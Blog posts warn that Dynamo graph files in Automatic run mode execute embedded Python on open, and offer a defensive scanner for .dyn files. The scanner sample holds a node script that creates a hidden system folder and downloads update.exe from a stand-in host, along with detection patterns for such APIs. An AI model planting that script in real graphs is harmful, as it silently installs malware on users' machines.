All posts by BIM Extension

Dynamo’s Security Vulnerability

Last week, I decided to see how far I could push Python nodes in Dynamo when it comes to files outside of Revit, and I believe I have discovered a vulnerability in which an attacker can use a Python node inside a Dynamo graph to run code on your machine with your privileges. There were similar discussions on the Dynamo forums earlier this year, but those revolved around the possibility of malicious custom packages. The difference (and the frightening part) about this vulnerability is that you do not need to download a custom package to your hard drive to be exposed: the Python node, and its code, travel inside the .dyn graph file itself. Strictly speaking, nothing here is a bug in Dynamo; the Python node does exactly what it was designed to do. The problem is that a graph file can carry arbitrary code, so it deserves the same caution as a macro-enabled Office document.

Example

If you would like to see an example of how this works, download this graph and open it in Dynamo. It is a simple graph with a single Python node. You do not need to know Python to follow the example.

Dynamal

How it works

If you opened the Dynamo graph, you will have noticed that it was set to run automatically. Dynamo stores the run mode in the graph file, so a graph saved in Automatic mode executes every node, including the Python node, the moment it is opened; you never click Run. That means the graph has already done everything it needs to put the payload on your hard drive. With around 30 lines of code, this graph created a folder on your C drive disguised as a system folder, downloaded a file from the internet without asking you, and saved that file to disk. A Dynamo Python node can load .NET assemblies, so the script has the same access to the file system and the network as the Revit process it runs in, which is everything your Windows user account is allowed to do.

For the sake of this example, I added a dialog window that pops up once the script has run. An attacker would not extend that courtesy: the whole point is to save malware to your PC without you knowing.

What’s the harm in downloading a file without permission?

Most harmful files need to be executed for an attack to succeed, and you might expect Windows to warn you before running an unknown executable. That warning is not guaranteed: SmartScreen keys off the Mark of the Web that browsers attach to downloads, and a file written to disk by a script does not necessarily carry that mark, while a UAC prompt only appears if the program asks for administrator rights. And even when a prompt does appear, are you paying attention when you run software updates?

A prime example of malware disguised as a software updater is the well-documented Placeholder Trojan. This simple script gives an attacker every keystroke you press and the ability to send screenshots of your PC to the attacker, and it can easily be disguised as a Java updater, as described in "Placeholder Trojan: Writing a Malware Software" by Garrett Bourg, Matt Bullock, and Robert Miller (a paper written under the guidance of Prof. Raj Jain).

Potential

Creating folders and downloading files is only one example of what a Python node can do. The node is arbitrary code running as you: anything you could do from a command prompt, including reading and uploading your files, deleting them, or launching other programs, it can do as well, with no prompt for your approval.
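You do not have to open a graph to find out whether it will do the kind of thing described under "How it works" and "Potential". The scan below is an added example, not code from the original post: it reads a .dyn file as text and reports the saved run mode, every Python node, and the parts of each node's script that warrant a closer look (network access, process execution, hidden/system attributes, .NET interop). It assumes the Dynamo 1.x XML layout (a `Workspace` root carrying a `RunType` attribute, Python nodes with a `Script` child) and the Dynamo 2.x JSON layout (`Nodes[].ConcreteType`, `Nodes[].Code` and `View.Dynamo.RunType`); those layouts are assumptions, not an official schema. The three sample graphs are constructed for the example, and the node script in the first one is a string the scanner reads and never runs. This is a keyword triage, so a clean result means "nothing obvious", not "safe".

```python
"""Static triage of Dynamo .dyn graph files before opening them (added example).
File layouts are assumptions about Dynamo 1.x XML and 2.x JSON graphs."""
import json
import re
import xml.etree.ElementTree as ET

# Substrings of a Python node's script that deserve a manual look. Plain regexes,
# not a parser: an author can obfuscate, so no hits means "nothing obvious".
SUSPICIOUS_PATTERNS = {
    "net_access": r"\bSystem\.Net\b|\bWebClient\b|\bDownloadFile\b|\burllib\b|\bHttpWebRequest\b",
    "process_exec": r"\bsubprocess\b|\bProcess\.Start\b|\bos\.system\b|\bos\.startfile\b",
    "file_write": r"\bFile\.Write\w*\b|\bopen\([^)]*['\"][wa]b?['\"]",
    "hidden_attr": r"\bFileAttributes\.(Hidden|System)\b|\battrib\b",
    "clr_interop": r"\bimport clr\b|\bclr\.AddReference\b",
}


def _python_nodes_xml(root):
    """Yield (label, script) for each Python node in an assumed Dynamo 1.x XML graph."""
    for el in root.iter():
        # assumed form: <PythonNodeModels.PythonNode nickname="..."><Script>code</Script>...
        if "Python" in el.tag or "Python" in (el.get("type") or ""):
            script = el.find("Script")
            yield el.get("nickname") or el.tag, (script.text or "") if script is not None else ""


def _python_nodes_json(doc):
    """Yield (label, script) for each Python node in an assumed Dynamo 2.x JSON graph."""
    for node in doc.get("Nodes", []):
        if "Python" in node.get("ConcreteType", ""):
            yield node.get("Id", "?"), node.get("Code", "")


def scan_dyn(text):
    """Return the saved run mode, every Python node with its hits, and a risk label."""
    text = text.lstrip("\ufeff \t\r\n")
    if text.startswith("{"):
        doc = json.loads(text)
        run_type = doc.get("View", {}).get("Dynamo", {}).get("RunType", "Manual")
        nodes = list(_python_nodes_json(doc))
    else:
        root = ET.fromstring(text)
        run_type = root.get("RunType", "Manual")
        nodes = list(_python_nodes_xml(root))

    findings = []
    for label, code in nodes:
        hits = sorted(name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, code))
        findings.append({"node": label, "hits": hits})

    auto_run = run_type.lower() == "automatic"
    if auto_run and any(f["hits"] for f in findings):
        risk = "high"      # runs on open and the script reaches net/process/filesystem APIs
    elif findings:
        risk = "review"    # Python present: read the script before pressing Run
    else:
        risk = "low"       # no Python node; only Dynamo's own nodes execute
    return {"run_type": run_type, "auto_run": auto_run, "python_nodes": findings, "risk": risk}


def scan_file(path):
    with open(path, encoding="utf-8-sig") as fh:
        return scan_dyn(fh.read())


# Constructed sample 1: auto-run XML graph whose Python node mirrors the post's
# description. The script is data here; nothing in this file executes it.
SAMPLE_XML_AUTORUN = r"""<?xml version="1.0" encoding="utf-8"?>
<Workspace Version="1.3.0.875" Name="Home" RunType="Automatic">
  <Elements>
    <PythonNodeModels.PythonNode guid="0001" type="PythonNodeModels.PythonNode" nickname="Python Script" inputcount="1">
      <PortInfo index="0" default="False" />
      <Script>import clr
clr.AddReference('System')
from System.Net import WebClient
from System.IO import Directory, File, FileAttributes
target = r'C:\Windows-Updates'
Directory.CreateDirectory(target)
File.SetAttributes(target, FileAttributes.Hidden | FileAttributes.System)
WebClient().DownloadFile('http://example.invalid/update.exe', target + r'\update.exe')
OUT = target</Script>
    </PythonNodeModels.PythonNode>
  </Elements>
</Workspace>
"""

# Constructed sample 2: manual-run JSON graph with a harmless Python node.
SAMPLE_JSON_MANUAL = json.dumps({
    "Nodes": [{"ConcreteType": "PythonNodeModels.PythonNode, PythonNodeModels",
               "Id": "a1b2c3", "Code": "OUT = [x * 2 for x in IN[0]]"}],
    "View": {"Dynamo": {"RunType": "Manual"}},
})

# Constructed sample 3: auto-run XML graph with no Python node at all.
SAMPLE_XML_NO_PYTHON = ('<Workspace RunType="Automatic"><Elements>'
                        '<CoreNodeModels.Input.DoubleInput nickname="Number" /></Elements></Workspace>')

if __name__ == "__main__":
    for name, text in [("autorun", SAMPLE_XML_AUTORUN), ("manual", SAMPLE_JSON_MANUAL),
                       ("no_python", SAMPLE_XML_NO_PYTHON)]:
        print(name, json.dumps(scan_dyn(text), indent=1))
```

Run it against a real file with `scan_file("graph.dyn")`. A `high` result means the graph will execute code that reaches the network, the process table or the file system the moment it opens; a `review` result means there is Python in the graph and you should read it, in a text editor, before pressing Run.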

Conclusion

Let this serve as a warning to all of my fellow Dynamo users out there. Be cautious about opening Dynamo graphs from sources you do not trust, and treat a .dyn file like any other executable attachment. A graph file is plain text, so before opening one you can read it in a text editor and look for Python nodes and for the saved run mode; if you must open an untrusted graph, do it on a machine that holds nothing you care about. Malicious code can be hidden deep within complex graphs, in custom packages, and in custom nodes, which can themselves contain Python nodes.

Seattle Dynamo User Group

Rather than hosting a Dynamo training session in the greater Seattle area, we decided to organize and sponsor the Seattle Dynamo User Group Meetup! The meetup group was only formed on February 1, 2017 and we already have 17 members.

We will schedule the first meetup as soon as we have a speaker and a venue in place. We are currently searching for both, so please let us know if you can help us find either.

We are extremely excited to lead this community! Here’s to sharing, learning, and networking with other Dynamo users in Seattle.


Coming Soon: Dynamo training in Seattle, San Francisco
We are extremely excited to announce that we will be hosting our first Dynamo training session in January 2017. The class is intended for Revit users who would like to leverage Dynamo to eliminate repetitive tasks and build complex geometry in Revit.

The class will be held in either Seattle, Bellevue, or San Francisco – location is TBD. Subscribe to our mailing list above if you would like to be notified of any updates regarding the upcoming Dynamo training session in Seattle, Washington.